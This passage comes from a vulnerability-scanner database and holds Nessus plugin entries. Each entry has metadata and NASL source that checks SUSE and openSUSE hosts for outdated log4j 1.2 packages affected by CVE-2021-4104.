value:\"2022/01/20\");\n\n script_cve_id(\"CVE-2021-4104\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n\n script_name(english:\"openSUSE 15 Security Update : log4j12 (openSUSE-SU-2021:4112-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the\nopenSUSE-SU-2021:4112-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write\n access to the Log4j configuration. The attacker can provide TopicBindingName and\n TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result\n in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2\n when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193662\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/U355AEBE4AWYTPUPBMC3XAO6XBTWFRBL/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?72242b66\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-4104\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j12, log4j12-javadoc and / or log4j12-manual packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-4104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j12-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j12-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'log4j12-1.2.17-4.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j12-javadoc-1.2.17-4.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'log4j12-manual-1.2.17-4.3.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'log4j12 / log4j12-javadoc / log4j12-manual');\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-11T03:45:20", "description": "The remote SUSE Linux SLES15 host has packages installed that are affected by a vulnerability as referenced in the SUSE- SU-2021:4111-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-12-18T00:00:00", "type": "nessus", "title": "SUSE SLES15 Security Update : log4j (SUSE-SU-2021:4111-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-01-20T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:log4j", "p-cpe:/a:novell:suse_linux:log4j-manual", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2021-4111-1.NASL", "href": "https://www.tenable.com/plugins/nessus/156169", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2021:4111-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156169);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/20\");\n\n script_cve_id(\"CVE-2021-4104\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2021:4111-1\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n\n script_name(english:\"SUSE SLES15 Security Update : log4j (SUSE-SU-2021:4111-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLES15 host has packages installed that are affected by a vulnerability as referenced in the SUSE-\nSU-2021:4111-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write\n access to the Log4j configuration. The attacker can provide TopicBindingName and\n TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result\n in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2\n when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193662\");\n # https://lists.suse.com/pipermail/sle-security-updates/2021-December/009917.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b31ab146\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-4104\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j and / or log4j-manual packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-4104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:log4j-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLES15', 'SUSE ' + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE ' + os_ver, cpu);\n\nvar sp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0/1\", os_ver + \" SP\" + sp);\n\nvar pkgs = [\n {'reference':'log4j-1.2.17-5.6.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-15'},\n {'reference':'log4j-manual-1.2.17-5.6.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-15'},\n {'reference':'log4j-1.2.17-5.6.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-15.1'},\n {'reference':'log4j-manual-1.2.17-5.6.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-15.1'},\n {'reference':'log4j-1.2.17-5.6.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-ESPOS-release-1'},\n {'reference':'log4j-manual-1.2.17-5.6.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-ESPOS-release-1'},\n {'reference':'log4j-1.2.17-5.6.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-ESPOS-release-15'},\n {'reference':'log4j-1.2.17-5.6.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-ESPOS-release-15'},\n {'reference':'log4j-manual-1.2.17-5.6.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-ESPOS-release-15'},\n {'reference':'log4j-manual-1.2.17-5.6.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-ESPOS-release-15'},\n {'reference':'log4j-1.2.17-5.6.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-LTSS-release-15'},\n {'reference':'log4j-1.2.17-5.6.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-LTSS-release-15'},\n {'reference':'log4j-manual-1.2.17-5.6.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-LTSS-release-15'},\n {'reference':'log4j-manual-1.2.17-5.6.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-LTSS-release-15'},\n {'reference':'log4j-1.2.17-5.6.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-LTSS-release-15.1'},\n {'reference':'log4j-manual-1.2.17-5.6.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLE_HPC-LTSS-release-15.1'},\n {'reference':'log4j-1.2.17-5.6.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-ltss-release-15'},\n {'reference':'log4j-manual-1.2.17-5.6.1', 'sp':'0', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-ltss-release-15'},\n {'reference':'log4j-1.2.17-5.6.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-ltss-release-15.1'},\n {'reference':'log4j-manual-1.2.17-5.6.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-ltss-release-15.1'},\n {'reference':'log4j-1.2.17-5.6.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-15.1'},\n {'reference':'log4j-manual-1.2.17-5.6.1', 'sp':'1', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-15.1'}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (exists_check) {\n if (!rpm_exists(release:release, rpm:exists_check)) continue;\n if ('ltss' >< tolower(exists_check)) ltss_caveat_required = TRUE;\n }\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n var ltss_plugin_caveat = NULL;\n if(ltss_caveat_required) ltss_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in SUSE Enterprise Linux Server LTSS\\n' +\n 'repositories. Access to these package security updates require\\n' +\n 'a paid SUSE LTSS subscription.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + ltss_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'log4j / log4j-manual');\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-11T05:33:59", "description": "The remote SUSE Linux SUSE15 host has a package installed that is affected by a vulnerability as referenced in the openSUSE-SU-2021:4111-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-12-18T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : log4j (openSUSE-SU-2021:4111-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-01-20T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:log4j-manual", "cpe:/o:novell:opensuse:15.3"], "id": "OPENSUSE-2021-4111.NASL", "href": "https://www.tenable.com/plugins/nessus/156177", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:4111-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156177);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/20\");\n\n script_cve_id(\"CVE-2021-4104\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n\n script_name(english:\"openSUSE 15 Security Update : log4j (openSUSE-SU-2021:4111-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has a package installed that is affected by a vulnerability as referenced in the\nopenSUSE-SU-2021:4111-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write\n access to the Log4j configuration. The attacker can provide TopicBindingName and\n TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result\n in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2\n when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193662\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/RTBP7J2BY2P4Y4VVPTAERSBRBHRHKIDZ/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?72cced44\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-4104\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j-manual package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-4104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:log4j-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\nvar pkgs = [\n {'reference':'log4j-manual-1.2.17-5.6.1', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'log4j-manual');\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-11T05:32:07", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the openSUSE-SU-2021:1612-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-12-25T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : log4j12 (openSUSE-SU-2021:1612-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-01-20T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:log4j12", "p-cpe:/a:novell:opensuse:log4j12-javadoc", "p-cpe:/a:novell:opensuse:log4j12-manual", "p-cpe:/a:novell:opensuse:log4j12-mini", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-1612.NASL", "href": "https://www.tenable.com/plugins/nessus/156276", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:1612-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156276);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/20\");\n\n script_cve_id(\"CVE-2021-4104\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n\n script_name(english:\"openSUSE 15 Security Update : log4j12 (openSUSE-SU-2021:1612-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the\nopenSUSE-SU-2021:1612-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write\n access to the Log4j configuration. The attacker can provide TopicBindingName and\n TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result\n in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2\n when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193662\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/VHZ7COSTMBF33SO76DMFLY7V62XQUQLS/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5441da09\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-4104\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j12, log4j12-javadoc, log4j12-manual and / or log4j12-mini packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-4104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No 